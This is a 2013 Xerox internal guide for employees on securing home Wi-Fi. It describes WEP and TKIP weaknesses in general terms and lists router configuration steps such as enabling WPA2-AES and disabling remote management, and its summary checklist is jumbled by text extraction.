Configuring your wireless

home network A users

guide
A document of actions, instructions, and
guidelines

October 2013
Version 2.0




2013 Xerox Corporation. All rights reserved. Xerox

and Xerox and Design

are
trademarks of Xerox Corporation in the United States and/or other countries. BRXXXXX
Linksys is a registered trademark of Cisco Systems, Inc.
Changes are periodically made to this document. Changes, technical inaccuracies, and
typographic errors will be corrected in subsequent editions.
Document Version: 2.0 (October 2013).
The Xerox Information Security Office (XISO) site may be viewed at:
https://team.thehub.xerox.com/sites/XISO/SitePages/XeroxHome.aspx
XISO can be reached at InfoSec@xerox.com





Xerox Internal Use Only



Table of Content
1 Overview .......................................................................... 1-2
Support ...................................................................................................... 1-2
Scope ........................................................................................................ 1-2
2 WEP Wireless Vulnerabilities and Exploits ...................... 2-3
Passive wireless attacks ........................................................................... 2-3
Active Wireless Attacks ............................................................................. 2-3
Negligence / Misconfiguration ................................................................... 2-3
Wired Network Attacks .............................................................................. 2-4
Specific Wireless Vulnerabilities ................................................................ 2-4
No forgery protection ................................................................................. 2-4
No protection against replays .................................................................... 2-4
Reusing initialization vectors ..................................................................... 2-5
3 TKIP Vulnerabilities and Exploits ..................................... 3-6
4 Security configuration guidelines ..................................... 4-7
Summary checklist .................................................................................. 4-12


Xerox Internal Use Only



1 Overview
Wireless vulnerabilities are a serious problem for Xerox, and our goal is to
reduce information risk globally by helping you to properly configure your
wireless home network and devices; thus helping you remove risks that you may
inadvertently be adding to Xerox's network health.

The purpose of this document is to help Xerox employees setup and configure a
secure home wireless network. Before doing so, take some time to become
familiar with the InfoSec 001 Information Security Policy and Xerox Information
Security Standards (XISS) documents.

The following sections will discuss the risks involved with wireless networks and
how to properly configure a home wireless network.
Support
The recommendations provided in this users guide are guidelines and may not
apply to all variations of home networks. Support for any issues associated with
home user networks are the responsibility of the individual employee.
Employees who have home networks should not contact Xerox or Xerox
Services for support. Employees with home networks are solely responsible for
their support. If a Xerox employee calls the helpdesk (IT support@Xerox -
http://itsupport.xerox.com/index.aspx) in regards to a wireless issue with their
home network, a time and materials charge will be applied to Xerox from IT
support@Xerox - http://itsupport.xerox.com/index.aspx.

Scope
The scope of this document is to provide the proper way to configure a home
wireless network that includes specific security controls that reduce and or
potentially eliminate the risk of compromise or exploits relative to the devices that
comprise the wireless home network however, detailed exploits will not be
covered and or explained within this document.



Configuring your wireless home network
Xerox Internal Use Only

2 WEP Wireless
Vulnerabilities and
Exploits
Before you begin the process of configuring your wireless home network, it is
important to understand the threats and risks that you are trying to protect
against. There are five main classes of threats against a wireless network:
Passive wireless attacks
A passive attack is one that gives an intruder access to information being
exchanged between communicating end-points, constituting eaves dropping or
theft. Passive attacks are non-intrusive and usually consist of an unauthorized
person operating one of the many WiFi (Wireless Fidelity) sniffing packages
available on the Internet. This person could be sitting in your parking lot, across
the street from your home merely listening or capturing the Wireless Local Area
Network (WLAN) traffic.
Active Wireless Attacks
An active attack is when an intruder intends to alter, destroy, intercept or forcibly
interact with the communication between the authorized WLAN devices. Such
attacks would include, but are not limited to, network intrusion, data manipulation,
session hijacking, denial of service, bandwidth theft, wireless, spam, and data
theft. Active attacks are intentional acts that are usually done with malicious
intent.
Negligence / Misconfiguration
Negligence need not be intentional. It is important that the proper guidelines are
followed and specific configurations are implemented by the end user in order to
gain maximum protection. Additionally, wireless router firewall misconfiguration
can potentially lead to home network exploit, exposure, and compromise.
Ensure that the home wireless router firewalls configuration is validated prior to
saving changes.

2-4 Xerox Internal Use Only
Wired Network Attacks
All of the traditional network risks are also present in the wireless world. Once the
connection is made, the wireless client has a presence on the wire that may
now be exploited. Exploits such as network browsing, port scanning, operating
system flaws and exploits, denial of service attacks, application flaws and bugs,
system, application, network access or wrong configurations are still viable
security risks.
Specific Wireless Vulnerabilities
These vulnerabilities are dependent on the system and are weaknesses to either
passive or active attacks or both. Potential wireless vulnerabilities include: no
real user identification and authentication, weak encryption methods, denial of
service, access point eavesdropping (IP or router), unauthorized disclosure
and/or modification of data by an unknown third party.
In addition to the above-mentioned classes, there is also a weakness of using
Wired Equivalent Privacy (WEP) and Temporal Key Integrity Protocol (TKIP) as a
means of security as noted below in the next section.
WEP has undergone much scrutiny and criticism that it may be compromised.
What makes WEP vulnerable? The major WEP flaws can be summarized into
three categories:
No forgery protection

There is no forgery protection provided by WEP. Even without knowing the
encryption key, an adversary can change 802.11 packets in arbitrary,
undetectable ways, deliver data to unauthorized parties, and masquerade as an
authorized user. Even worse, an adversary can also learn more about the
encryption key with forgery attacks than with strictly passive attacks.

No protection against replays

WEP does not offer any protection against replays. An adversary can create
forgeries without changing any data in an existing packet, simply by recording
WEP packets and then retransmitting later. Replay, a special type of forgery
attack, can be used to derive information about the encryption key and the data it
protects.

Configuring your wireless home network
Xerox Internal Use Only
Reusing initialization vectors

WEP enables an attacker to decrypt the encrypted data without the need to learn
the encryption key or even resorting to high-tech techniques. While often
dismissed as too slow, a patient attacker can compromise the encryption of an
entire network after only a few hours of data collection.


3-6 Xerox Internal Use Only


3 TKIP Vulnerabilities
and Exploits
What makes TKIP vulnerable? TKIP uses the same underlying mechanism as
WEP, and consequently is vulnerable to a number of similar attacks. The major
TKIP flaws can be exploited with a number of different attack vectors that include
Man in the Middle attacks (MITM), ARP poisoning attacks, denial of service, and
other similar attacks. TKIP can be compromised due to message falsification,
which utilizes MITM attacks which can leverage and forge encrypted short
packets, (such as ARP packets and etc.). MITM attacks and the method for
reducing the execution time of the attack can be accomplished and executed in
about one minute.



Configuring your wireless home network
Xerox Internal Use Only
4 Security
configuration
guidelines
This section will walk you through the 10 steps that are required to configure your
wireless home network with the proper security controls. The screen shots
provided are based upon a Cisco Linksys wireless router and are meant for
illustration purposes only, not an endorsement of the vendor or product.
Interfaces and configuration instructions will vary from product to product.
Please refer to all router manufacturer or vendor documentation for actual setup
and configuration.

1. Change the default administration router/access point
password.
2. Change the access server from HTTP to HTTPS
3. Disable remote management. Remote management would
allow you to change your wireless configuration from a
remote location (outside your home network). Enabling
remote management can lead to a potential denial of
service attack. Most manufacturers have remote
management disabled by default.



4-8 Xerox Internal Use Only

4. You will also need to take into account the following in home
devices:
a. Cordless phones on the same frequency
b. Another wireless network nearby
c. Microwaves
d. House construction walls, floors, wiring
e. Location of objects within the house. Metal will block or
bounce the signals.

These devices can and may cause interference.
As a user, if this occurs, change the default
"Wireless Channel" if you experience connection
drops on the WLAN connection. It is recommended
to limit the number of users who can access the
router. This can be done by limiting the number of
IPs within the DHCP pool and scope.

Configuring your wireless home network
Xerox Internal Use Only


5. Enable WPA2 and utilize AES encryption. Enable the highest
bit level encryption as possible. AES block ciphers are
generally 128, 192, and 256 bits respectively. In addition,
make sure that the wireless client software is updated on a
regular basis to ensure that the latest features are supported
based on the access point/router product.
6. Enable WPA2-PSK. Ensure that the group key renewal is set
to default or 600 seconds. If your router does not support
WPA2-PSK it is strongly recommended to procure a new
Wireless router / firewall product that supports WPA2 with AES
encryption.

4-10 Xerox Internal Use Only


Note: As illustrated below as an example, a WPA2 AES
enabled home wireless network (Linksys) versus an arbitrary
wireless network that is not enabled with WPA2 AES.




Configuring your wireless home network
Xerox Internal Use Only
7. Enable firewall protection, including Filter Internet NAT
Redirections.




















8. Wireless router location is key. Make sure your router is not
near a window because your signal can radiate outside your
home.

9. Review vendor sites periodically for firmware updates.



4-
S
T
h
n
W
2
3
4
5
6
-12 Xerox Intern
Summ
The table bel
ave complet
etwork.
Wireless Co
1 De
be
2 Ac
HT
3 Re
4 Th
rou
5 Th
wir
DH
6 AE

nal Use Only
mary c
ow provides
ted all of the
onfiguration
efault admini
een changed
ccess server
TTPS
emote mana
he default IP
uter configur
he number of
reless acces
HCP scope
ES encryptio
checkl
s a summary
e recommend
n Step
istrators pas
d
r has been c
gement has
Address to
ration has be
f IPs that ca
ss has been
on and WPA2
ist
y checklist th
ded steps to
ssword has
hanged to
s been disab
access the
een changed
an gain
limited by
2-PSK
hat should be
o secure you


bled
d



e used to en
ur wireless h

nsure you
home
Configuring your wireless home network
Xerox Internal Use Only
authentication has been enabled
7 MAC filtering has been enabled
8 SPI Firewall has been enabled


5-14 Xerox Internal Use Only
5 Resources
Wireless Security for Home Networks

http://www.sensible-computer-help.com/wireless-network-security.html


InfoSec 001 Information Security Policy

This policy governs the protection of Xerox Information in any form, including
verbal, electronic or hard copy, and in any media. It also applies to Xerox
Information at any location, including in an employee's home, and stored or
transmitted by any equipment or device, including equipment or storage media
owned by another company or owned personally by an employee. In addition,
this policy governs information protection measures required for Xerox
Information that is originated, processed, transmitted, or stored in electronic form.
It establishes rules for the use of protective measures and identifies the
responsibilities of managers and employees of Xerox and Xerox Business
Partners in protecting Xerox Information that exists in electronic form.

Xerox Information Security Standards (XISS)

The Xerox Information Security Standards set forth in this document are
designed to the Electronic Information System Security Policy, which establishes
the rules of protective measure and identifies responsibilities for protecting
information that exists in electronic form.